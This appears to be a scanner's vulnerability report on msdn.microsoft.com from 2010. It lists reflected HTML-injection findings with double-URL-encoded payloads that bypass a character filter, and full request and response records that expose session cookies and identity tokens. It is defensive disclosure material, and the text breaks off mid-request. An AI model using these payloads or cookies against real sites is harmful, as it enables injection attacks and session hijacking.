<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48b6c"><a>a82109ceb41/ms123401" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3898%2522%253e%253ca%253e4b48fd0aba8 was submitted in the REST URL parameter 3. This input was echoed as c3898"><a>4b48fd0aba8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms123401.aspxc3898%2522%253e%253ca%253e4b48fd0aba8 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:30 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms123401.aspxc3898"><a>4b48fd0aba8" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16d4f%2522%253e%253ca%253e3bf87eee46 was submitted in the REST URL parameter 1. This input was echoed as 16d4f"><a>3bf87eee46 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us16d4f%2522%253e%253ca%253e3bf87eee46/library/ms376734.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9197 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:55 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us16d4f"><a>3bf87eee46/library/ms376734" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1de4%2522%253e%253ca%253e15de1465623 was submitted in the REST URL parameter 2. This input was echoed as b1de4"><a>15de1465623 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryb1de4%2522%253e%253ca%253e15de1465623/ms376734.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryb1de4"><a>15de1465623/ms376734" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5baf%2522%253e%253ca%253ed814d454776 was submitted in the REST URL parameter 3. This input was echoed as f5baf"><a>d814d454776 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms376734.aspxf5baf%2522%253e%253ca%253ed814d454776 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:25 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms376734.aspxf5baf"><a>d814d454776" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbad9%2522%253e%253ca%253e8df1c91ad96 was submitted in the REST URL parameter 1. This input was echoed as dbad9"><a>8df1c91ad96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdbad9%2522%253e%253ca%253e8df1c91ad96/library/ms689718(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:15:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdbad9"><a>8df1c91ad96/library/ms689718(VS.85" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc98%2522%253e%253ca%253ea7defceea7f was submitted in the REST URL parameter 2. This input was echoed as 5dc98"><a>a7defceea7f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library5dc98%2522%253e%253ca%253ea7defceea7f/ms689718(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 